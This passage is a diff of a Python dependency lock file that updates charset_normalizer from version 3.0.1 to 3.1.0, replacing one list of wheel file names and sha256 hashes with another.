- {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ff6f3db31555657f3163b15a6b7c6938d08df7adbfc9dd13d9d19edad678f1e8"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:772b87914ff1152b92a197ef4ea40efe27a378606c39446ded52c8f80f79702e"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:70990b9c51340e4044cfc394a81f614f3f90d41397104d226f21e66de668730d"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:292d5e8ba896bbfd6334b096e34bffb56161c81408d6d036a7dfa6929cff8783"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:2edb64ee7bf1ed524a1da60cdcd2e1f6e2b4f66ef7c077680739f1641f62f555"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:31a9ddf4718d10ae04d9b18801bd776693487cbb57d74cc3458a7673f6f34639"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:44ba614de5361b3e5278e1241fda3dc1838deed864b50a10d7ce92983797fa76"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:12db3b2c533c23ab812c2b25934f60383361f8a376ae272665f8e48b88e8e1c6"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:c512accbd6ff0270939b9ac214b84fb5ada5f0409c44298361b2f5e13f9aed9e"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-win32.whl", hash = "sha256:502218f52498a36d6bf5ea77081844017bf7982cdbe521ad85e64cabee1b608b"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-win_amd64.whl", hash = "sha256:601f36512f9e28f029d9481bdaf8e89e5148ac5d89cffd3b05cd533eeb423b59"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:0298eafff88c99982a4cf66ba2efa1128e4ddaca0b05eec4c456bbc7db691d8d"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:a8d0fc946c784ff7f7c3742310cc8a57c5c6dc31631269876a88b809dbeff3d3"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:87701167f2a5c930b403e9756fab1d31d4d4da52856143b609e30a1ce7160f3c"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:14e76c0f23218b8f46c4d87018ca2e441535aed3632ca134b10239dfb6dadd6b"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:0c0a590235ccd933d9892c627dec5bc7511ce6ad6c1011fdf5b11363022746c1"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:8c7fe7afa480e3e82eed58e0ca89f751cd14d767638e2550c77a92a9e749c317"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:79909e27e8e4fcc9db4addea88aa63f6423ebb171db091fb4373e3312cb6d603"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8ac7b6a045b814cf0c47f3623d21ebd88b3e8cf216a14790b455ea7ff0135d18"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:72966d1b297c741541ca8cf1223ff262a6febe52481af742036a0b296e35fa5a"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:f9d0c5c045a3ca9bedfc35dca8526798eb91a07aa7a2c0fee134c6c6f321cbd7"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:5995f0164fa7df59db4746112fec3f49c461dd6b31b841873443bdb077c13cfc"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:4a8fcf28c05c1f6d7e177a9a46a1c52798bfe2ad80681d275b10dcf317deaf0b"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:761e8904c07ad053d285670f36dd94e1b6ab7f16ce62b9805c475b7aa1cffde6"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-win32.whl", hash = "sha256:71140351489970dfe5e60fc621ada3e0f41104a5eddaca47a7acb3c1b851d6d3"},
- {file = "charset_normalizer-3.0.1-cp311-cp311-win_amd64.whl", hash = "sha256:9ab77acb98eba3fd2a85cd160851816bfce6871d944d885febf012713f06659c"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:84c3990934bae40ea69a82034912ffe5a62c60bbf6ec5bc9691419641d7d5c9a"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:74292fc76c905c0ef095fe11e188a32ebd03bc38f3f3e9bcb85e4e6db177b7ea"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c95a03c79bbe30eec3ec2b7f076074f4281526724c8685a42872974ef4d36b72"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f4c39b0e3eac288fedc2b43055cfc2ca7a60362d0e5e87a637beac5d801ef478"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:df2c707231459e8a4028eabcd3cfc827befd635b3ef72eada84ab13b52e1574d"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:93ad6d87ac18e2a90b0fe89df7c65263b9a99a0eb98f0a3d2e079f12a0735837"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:59e5686dd847347e55dffcc191a96622f016bc0ad89105e24c14e0d6305acbc6"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:cd6056167405314a4dc3c173943f11249fa0f1b204f8b51ed4bde1a9cd1834dc"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_ppc64le.whl", hash = "sha256:083c8d17153ecb403e5e1eb76a7ef4babfc2c48d58899c98fcaa04833e7a2f9a"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_s390x.whl", hash = "sha256:f5057856d21e7586765171eac8b9fc3f7d44ef39425f85dbcccb13b3ebea806c"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:7eb33a30d75562222b64f569c642ff3dc6689e09adda43a082208397f016c39a"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-win32.whl", hash = "sha256:95dea361dd73757c6f1c0a1480ac499952c16ac83f7f5f4f84f0658a01b8ef41"},
- {file = "charset_normalizer-3.0.1-cp36-cp36m-win_amd64.whl", hash = "sha256:eaa379fcd227ca235d04152ca6704c7cb55564116f8bc52545ff357628e10602"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:3e45867f1f2ab0711d60c6c71746ac53537f1684baa699f4f668d4c6f6ce8e14"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cadaeaba78750d58d3cc6ac4d1fd867da6fc73c88156b7a3212a3cd4819d679d"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:911d8a40b2bef5b8bbae2e36a0b103f142ac53557ab421dc16ac4aafee6f53dc"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:503e65837c71b875ecdd733877d852adbc465bd82c768a067badd953bf1bc5a3"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a60332922359f920193b1d4826953c507a877b523b2395ad7bc716ddd386d866"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:16a8663d6e281208d78806dbe14ee9903715361cf81f6d4309944e4d1e59ac5b"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:a16418ecf1329f71df119e8a65f3aa68004a3f9383821edcb20f0702934d8087"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:9d9153257a3f70d5f69edf2325357251ed20f772b12e593f3b3377b5f78e7ef8"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:02a51034802cbf38db3f89c66fb5d2ec57e6fe7ef2f4a44d070a593c3688667b"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:2e396d70bc4ef5325b72b593a72c8979999aa52fb8bcf03f701c1b03e1166918"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:11b53acf2411c3b09e6af37e4b9005cba376c872503c8f28218c7243582df45d"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-win32.whl", hash = "sha256:0bf2dae5291758b6f84cf923bfaa285632816007db0330002fa1de38bfcb7154"},
- {file = "charset_normalizer-3.0.1-cp37-cp37m-win_amd64.whl", hash = "sha256:2c03cc56021a4bd59be889c2b9257dae13bf55041a3372d3295416f86b295fb5"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:024e606be3ed92216e2b6952ed859d86b4cfa52cd5bc5f050e7dc28f9b43ec42"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:4b0d02d7102dd0f997580b51edc4cebcf2ab6397a7edf89f1c73b586c614272c"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:358a7c4cb8ba9b46c453b1dd8d9e431452d5249072e4f56cfda3149f6ab1405e"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:81d6741ab457d14fdedc215516665050f3822d3e56508921cc7239f8c8e66a58"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:8b8af03d2e37866d023ad0ddea594edefc31e827fee64f8de5611a1dbc373174"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9cf4e8ad252f7c38dd1f676b46514f92dc0ebeb0db5552f5f403509705e24753"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e696f0dd336161fca9adbb846875d40752e6eba585843c768935ba5c9960722b"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c22d3fe05ce11d3671297dc8973267daa0f938b93ec716e12e0f6dee81591dc1"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:109487860ef6a328f3eec66f2bf78b0b72400280d8f8ea05f69c51644ba6521a"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:37f8febc8ec50c14f3ec9637505f28e58d4f66752207ea177c1d67df25da5aed"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:f97e83fa6c25693c7a35de154681fcc257c1c41b38beb0304b9c4d2d9e164479"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:a152f5f33d64a6be73f1d30c9cc82dfc73cec6477ec268e7c6e4c7d23c2d2291"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:39049da0ffb96c8cbb65cbf5c5f3ca3168990adf3551bd1dee10c48fce8ae820"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-win32.whl", hash = "sha256:4457ea6774b5611f4bed5eaa5df55f70abde42364d498c5134b7ef4c6958e20e"},
- {file = "charset_normalizer-3.0.1-cp38-cp38-win_amd64.whl", hash = "sha256:e62164b50f84e20601c1ff8eb55620d2ad25fb81b59e3cd776a1902527a788af"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:8eade758719add78ec36dc13201483f8e9b5d940329285edcd5f70c0a9edbd7f"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:8499ca8f4502af841f68135133d8258f7b32a53a1d594aa98cc52013fff55678"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:3fc1c4a2ffd64890aebdb3f97e1278b0cc72579a08ca4de8cd2c04799a3a22be"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:00d3ffdaafe92a5dc603cb9bd5111aaa36dfa187c8285c543be562e61b755f6b"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c2ac1b08635a8cd4e0cbeaf6f5e922085908d48eb05d44c5ae9eabab148512ca"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f6f45710b4459401609ebebdbcfb34515da4fc2aa886f95107f556ac69a9147e"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3ae1de54a77dc0d6d5fcf623290af4266412a7c4be0b1ff7444394f03f5c54e3"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3b590df687e3c5ee0deef9fc8c547d81986d9a1b56073d82de008744452d6541"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ab5de034a886f616a5668aa5d098af2b5385ed70142090e2a31bcbd0af0fdb3d"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9cb3032517f1627cc012dbc80a8ec976ae76d93ea2b5feaa9d2a5b8882597579"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:608862a7bf6957f2333fc54ab4399e405baad0163dc9f8d99cb236816db169d4"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:0f438ae3532723fb6ead77e7c604be7c8374094ef4ee2c5e03a3a17f1fca256c"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:356541bf4381fa35856dafa6a965916e54bed415ad8a24ee6de6e37deccf2786"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-win32.whl", hash = "sha256:39cf9ed17fe3b1bc81f33c9ceb6ce67683ee7526e65fde1447c772afc54a1bb8"},
- {file = "charset_normalizer-3.0.1-cp39-cp39-win_amd64.whl", hash = "sha256:0a11e971ed097d24c534c037d298ad32c6ce81a45736d31e0ff0ad37ab437d59"},
- {file = "charset_normalizer-3.0.1-py3-none-any.whl", hash = "sha256:7e189e2e1d3ed2f4aebabd2d5b0f931e883676e51c7624826e0a4e5fe8a0bf24"},
+ {file = "charset-normalizer-3.1.0.tar.gz", hash = "sha256:34e0a2f9c370eb95597aae63bf85eb5e96826d81e3dcf88b8886012906f509b5"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:e0ac8959c929593fee38da1c2b64ee9778733cdf03c482c9ff1d508b6b593b2b"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d7fc3fca01da18fbabe4625d64bb612b533533ed10045a2ac3dd194bfa656b60"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:04eefcee095f58eaabe6dc3cc2262f3bcd776d2c67005880894f447b3f2cb9c1"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:20064ead0717cf9a73a6d1e779b23d149b53daf971169289ed2ed43a71e8d3b0"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1435ae15108b1cb6fffbcea2af3d468683b7afed0169ad718451f8db5d1aff6f"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c84132a54c750fda57729d1e2599bb598f5fa0344085dbde5003ba429a4798c0"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:75f2568b4189dda1c567339b48cba4ac7384accb9c2a7ed655cd86b04055c795"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:11d3bcb7be35e7b1bba2c23beedac81ee893ac9871d0ba79effc7fc01167db6c"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:891cf9b48776b5c61c700b55a598621fdb7b1e301a550365571e9624f270c203"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:5f008525e02908b20e04707a4f704cd286d94718f48bb33edddc7d7b584dddc1"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:b06f0d3bf045158d2fb8837c5785fe9ff9b8c93358be64461a1089f5da983137"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:49919f8400b5e49e961f320c735388ee686a62327e773fa5b3ce6721f7e785ce"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:22908891a380d50738e1f978667536f6c6b526a2064156203d418f4856d6e86a"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-win32.whl", hash = "sha256:12d1a39aa6b8c6f6248bb54550efcc1c38ce0d8096a146638fd4738e42284448"},
+ {file = "charset_normalizer-3.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:65ed923f84a6844de5fd29726b888e58c62820e0769b76565480e1fdc3d062f8"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:9a3267620866c9d17b959a84dd0bd2d45719b817245e49371ead79ed4f710d19"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:6734e606355834f13445b6adc38b53c0fd45f1a56a9ba06c2058f86893ae8017"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:f8303414c7b03f794347ad062c0516cee0e15f7a612abd0ce1e25caf6ceb47df"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:aaf53a6cebad0eae578f062c7d462155eada9c172bd8c4d250b8c1d8eb7f916a"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3dc5b6a8ecfdc5748a7e429782598e4f17ef378e3e272eeb1340ea57c9109f41"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:e1b25e3ad6c909f398df8921780d6a3d120d8c09466720226fc621605b6f92b1"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0ca564606d2caafb0abe6d1b5311c2649e8071eb241b2d64e75a0d0065107e62"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b82fab78e0b1329e183a65260581de4375f619167478dddab510c6c6fb04d9b6"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:bd7163182133c0c7701b25e604cf1611c0d87712e56e88e7ee5d72deab3e76b5"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:11d117e6c63e8f495412d37e7dc2e2fff09c34b2d09dbe2bee3c6229577818be"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:cf6511efa4801b9b38dc5546d7547d5b5c6ef4b081c60b23e4d941d0eba9cbeb"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:abc1185d79f47c0a7aaf7e2412a0eb2c03b724581139193d2d82b3ad8cbb00ac"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:cb7b2ab0188829593b9de646545175547a70d9a6e2b63bf2cd87a0a391599324"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-win32.whl", hash = "sha256:c36bcbc0d5174a80d6cccf43a0ecaca44e81d25be4b7f90f0ed7bcfbb5a00909"},
+ {file = "charset_normalizer-3.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:cca4def576f47a09a943666b8f829606bcb17e2bc2d5911a46c8f8da45f56755"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0c95f12b74681e9ae127728f7e5409cbbef9cd914d5896ef238cc779b8152373"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fca62a8301b605b954ad2e9c3666f9d97f63872aa4efcae5492baca2056b74ab"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ac0aa6cd53ab9a31d397f8303f92c42f534693528fafbdb997c82bae6e477ad9"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c3af8e0f07399d3176b179f2e2634c3ce9c1301379a6b8c9c9aeecd481da494f"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a5fc78f9e3f501a1614a98f7c54d3969f3ad9bba8ba3d9b438c3bc5d047dd28"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:628c985afb2c7d27a4800bfb609e03985aaecb42f955049957814e0491d4006d"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:74db0052d985cf37fa111828d0dd230776ac99c740e1a758ad99094be4f1803d"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:1e8fcdd8f672a1c4fc8d0bd3a2b576b152d2a349782d1eb0f6b8e52e9954731d"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:04afa6387e2b282cf78ff3dbce20f0cc071c12dc8f685bd40960cc68644cfea6"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:dd5653e67b149503c68c4018bf07e42eeed6b4e956b24c00ccdf93ac79cdff84"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d2686f91611f9e17f4548dbf050e75b079bbc2a82be565832bc8ea9047b61c8c"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-win32.whl", hash = "sha256:4155b51ae05ed47199dc5b2a4e62abccb274cee6b01da5b895099b61b1982974"},
+ {file = "charset_normalizer-3.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:322102cdf1ab682ecc7d9b1c5eed4ec59657a65e1c146a0da342b78f4112db23"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:e633940f28c1e913615fd624fcdd72fdba807bf53ea6925d6a588e84e1151531"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:3a06f32c9634a8705f4ca9946d667609f52cf130d5548881401f1eb2c39b1e2c"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:7381c66e0561c5757ffe616af869b916c8b4e42b367ab29fedc98481d1e74e14"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3573d376454d956553c356df45bb824262c397c6e26ce43e8203c4c540ee0acb"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e89df2958e5159b811af9ff0f92614dabf4ff617c03a4c1c6ff53bf1c399e0e1"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:78cacd03e79d009d95635e7d6ff12c21eb89b894c354bd2b2ed0b4763373693b"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:de5695a6f1d8340b12a5d6d4484290ee74d61e467c39ff03b39e30df62cf83a0"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1c60b9c202d00052183c9be85e5eaf18a4ada0a47d188a83c8f5c5b23252f649"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:f645caaf0008bacf349875a974220f1f1da349c5dbe7c4ec93048cdc785a3326"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:ea9f9c6034ea2d93d9147818f17c2a0860d41b71c38b9ce4d55f21b6f9165a11"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:80d1543d58bd3d6c271b66abf454d437a438dff01c3e62fdbcd68f2a11310d4b"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:73dc03a6a7e30b7edc5b01b601e53e7fc924b04e1835e8e407c12c037e81adbd"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:6f5c2e7bc8a4bf7c426599765b1bd33217ec84023033672c1e9a8b35eaeaaaf8"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-win32.whl", hash = "sha256:12a2b561af122e3d94cdb97fe6fb2bb2b82cef0cdca131646fdb940a1eda04f0"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:3160a0fd9754aab7d47f95a6b63ab355388d890163eb03b2d2b87ab0a30cfa59"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:38e812a197bf8e71a59fe55b757a84c1f946d0ac114acafaafaf21667a7e169e"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6baf0baf0d5d265fa7944feb9f7451cc316bfe30e8df1a61b1bb08577c554f31"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:8f25e17ab3039b05f762b0a55ae0b3632b2e073d9c8fc88e89aca31a6198e88f"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3747443b6a904001473370d7810aa19c3a180ccd52a7157aacc264a5ac79265e"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b116502087ce8a6b7a5f1814568ccbd0e9f6cfd99948aa59b0e241dc57cf739f"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d16fd5252f883eb074ca55cb622bc0bee49b979ae4e8639fff6ca3ff44f9f854"},
